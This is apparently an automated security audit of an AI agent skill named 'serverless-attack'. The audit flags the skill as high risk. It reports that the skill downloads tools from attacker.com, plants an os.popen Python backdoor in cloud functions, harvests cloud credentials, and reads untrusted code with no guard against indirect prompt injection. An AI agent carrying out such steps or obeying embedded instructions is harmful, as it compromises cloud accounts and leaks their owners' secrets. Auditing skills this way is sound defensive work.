serverless-attack
Fail
Audited by Gen Agent Trust Hub on Apr 22, 2026
Risk Level: HIGHEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill instructs the agent to download external binaries (e.g.,
fscan) from an untrusted domain (attacker.com) directly to the function's/tmpdirectory. - [COMMAND_EXECUTION]: Provides instructions to execute a wide variety of shell commands and cloud CLI tools (
aws,tccli) for resource enumeration, configuration modification, and local binary execution. - [REMOTE_CODE_EXECUTION]: Includes a complete template for a Python backdoor designed to be injected into cloud functions, utilizing
os.popen()to execute arbitrary system commands via function events. - [DATA_EXFILTRATION]: Focuses on identifying and extracting sensitive credentials, including database passwords, API keys, and cloud environment tokens (AK/SK, session tokens) from environment variables and source code.
- [PROMPT_INJECTION]: The skill demonstrates an attack surface for indirect prompt injection by ingesting and processing untrusted source code and configuration files during its auditing phase.
- Ingestion points: Local function code (
lambda_code/) and configuration files analyzed viagrepandcat. - Boundary markers: Absent; instructions do not specify delimiting external content or ignoring embedded instructions.
- Capability inventory: Includes cloud configuration updates (
update-function-code), network operations (curl), and shell command execution. - Sanitization: Absent; the skill does not suggest validation or escaping of the data being analyzed.
Recommendations
- AI detected serious security threats
Audit Metadata